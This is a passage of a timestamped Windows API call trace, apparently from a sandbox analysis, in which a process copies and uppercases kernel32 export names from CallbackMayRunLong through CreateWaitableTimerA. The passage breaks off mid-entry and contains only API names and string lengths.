[0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0081.017] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0081.017] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0081.017] lstrlenA (lpString="CANCELIO") returned 8 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0081.017] lstrlenA (lpString="CANCELIOEX") returned 10 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0081.017] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0081.017] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0081.017] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0081.018] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0081.018] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0081.018] lstrlenA (lpString="CHECKELEVATION") returned 14 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0081.018] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0081.018] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0081.018] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0081.018] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0081.018] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0081.018] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0081.018] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0081.018] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0081.018] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0081.018] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0081.018] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0081.018] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0081.018] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0081.018] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0081.018] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0081.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0081.019] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0081.019] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0081.019] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0081.019] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0081.019] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0081.019] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0081.019] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0081.019] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0081.019] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0081.019] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0081.019] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0081.019] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0081.019] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0081.019] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0081.019] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0081.019] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0081.019] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0081.019] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0081.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0081.019] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0081.020] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0081.020] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0081.020] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0081.020] lstrlenA (lpString="COPYCONTEXT") returned 11 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0081.020] lstrlenA (lpString="COPYFILEA") returned 9 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0081.020] lstrlenA (lpString="COPYFILEEXA") returned 11 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0081.020] lstrlenA (lpString="COPYFILEEXW") returned 11 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0081.020] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0081.020] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0081.020] lstrlenA (lpString="COPYFILEW") returned 9 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0081.020] lstrlenA (lpString="COPYLZFILE") returned 10 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0081.020] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0081.020] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0081.020] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0081.020] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0081.020] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0081.020] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0081.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0081.020] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0081.021] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0081.021] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0081.021] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0081.021] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0081.021] lstrlenA (lpString="CREATEEVENTA") returned 12 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0081.021] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0081.021] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0081.021] lstrlenA (lpString="CREATEEVENTW") returned 12 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0081.021] lstrlenA (lpString="CREATEFIBER") returned 11 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0081.021] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0081.021] lstrlenA (lpString="CREATEFILEA") returned 11 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0081.021] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0081.021] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0081.021] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0081.021] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0081.021] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0081.021] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0081.021] lstrlenA (lpString="CREATEFILEW") returned 11 [0081.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0081.022] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0081.022] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0081.022] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0081.022] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0081.022] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0081.022] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0081.022] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0081.022] lstrlenA (lpString="CREATEJOBSET") returned 12 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0081.022] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0081.022] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0081.022] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0081.022] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0081.022] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0081.022] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0081.022] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0081.022] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0081.022] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0081.022] lstrlenA (lpString="CREATEPIPE") returned 10 [0081.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0081.022] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0081.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0081.023] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0081.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0081.023] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0081.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0081.023] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0081.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0081.023] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0081.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0081.023] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0081.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0081.023] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0081.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0081.023] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0081.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0081.023] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0081.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0081.023] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0081.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0081.023] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0081.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0081.023] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0081.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0081.024] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0081.024] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0081.024] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0081.024] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0081.024] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0081.024] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0081.024] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0081.024] lstrlenA (lpString="CREATETHREAD") returned 12 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0081.024] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0081.024] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0081.024] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0081.024] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0081.024] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0081.024] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0081.024] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0081.024] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0081.024] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") 